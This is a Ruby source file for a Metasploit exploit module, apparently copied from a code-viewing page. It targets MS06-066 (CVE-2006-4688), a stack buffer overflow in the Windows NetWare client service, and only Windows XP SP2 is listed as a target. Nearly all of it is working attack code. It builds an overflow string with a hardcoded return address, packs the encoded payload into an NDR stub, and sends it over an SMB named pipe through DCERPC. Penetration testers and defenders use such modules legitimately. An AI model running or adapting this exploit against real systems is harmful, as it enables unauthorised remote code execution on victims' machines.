Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'MS06-066 Microsoft Services nwwks.dll Module Exploit',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in the svchost service, when the netware
17
        client service is running. This specific vulnerability is in the nwapi32.dll module.
18
      },
19
      'Author'         => [ 'pusscat' ],
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          [ 'CVE', '2006-4688'],
24
          [ 'OSVDB', '30260'],
25
          [ 'BID', '21023'],
26
          [ 'MSB', 'MS06-066'],
27

28
        ],
29
      'DefaultOptions' =>
30
        {
31
          'EXITFUNC' => 'thread',
32
        },
33
      'Privileged'     => true,
34
      'Payload'        =>
35
        {
36
          'Space'    => 1000,
37
          'BadChars' => "",
38
          'Compat'   =>
39
          {
40
            # -ws2ord XXX?
41
          },
42
          'StackAdjustment' => -3500,
43
        },
44
      'Platform'       => 'win',
45
      'Targets'        =>
46
        [
47
          [
48
            'Windows XP SP2',
49
            {
50
              'Ret'      => 0x616566fb, # modemui.dll   [esp + 16]: popaw, ret
51
            },
52
          ]
53
        ],
54

55
      'DefaultTarget' => 0,
56
      'DisclosureDate' => '2006-11-14'))
57

58
    register_options(
59
      [
60
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nwwks']),
61
      ])
62

63
  end
64

65
  def exploit
66
    # [in] [unique] wchar *
67
    # [in] [unique] wchar *
68
    # [out] long
69

70
    ofstring    = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
71
    stubdata =
72
      NDR.long(rand(0xffffffff)) +
73
        NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
74
      NDR.long(rand(0xffffffff)) +
75
        NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
76
      NDR.long(rand(0xffffffff)) +
77
        NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
78
      NDR.long(rand(0xffffffff)) +
79
        NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
80
        NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
81

82
    print_status("Connecting to the SMB service...")
83
    connect()
84
    smb_login()
85

86
    handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
87
    print_status("Binding to #{handle} ...")
88
    dcerpc_bind(handle)
89
    print_status("Bound to #{handle} ...")
90

91
    print_status("Calling the vulnerable function...")
92

93
    begin
94
      dcerpc.call(0x01, stubdata)
95
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
96
      print_status('Server did not respond, this is expected')
97
    rescue => e
98
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
99
        print_status('Server disconnected, this is expected')
100
      else
101
        raise e
102
      end
103
    else
104
      print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}")
105
    end
106

107
    # Cleanup
108
    handler
109
    disconnect
110

111
    if (dcerpc.last_response != nil and
112
      dcerpc.last_response.stub_data != nil and
113
      dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
114
      return true
115
    else
116
      return false
117
    end
118
  end
119
end
120

121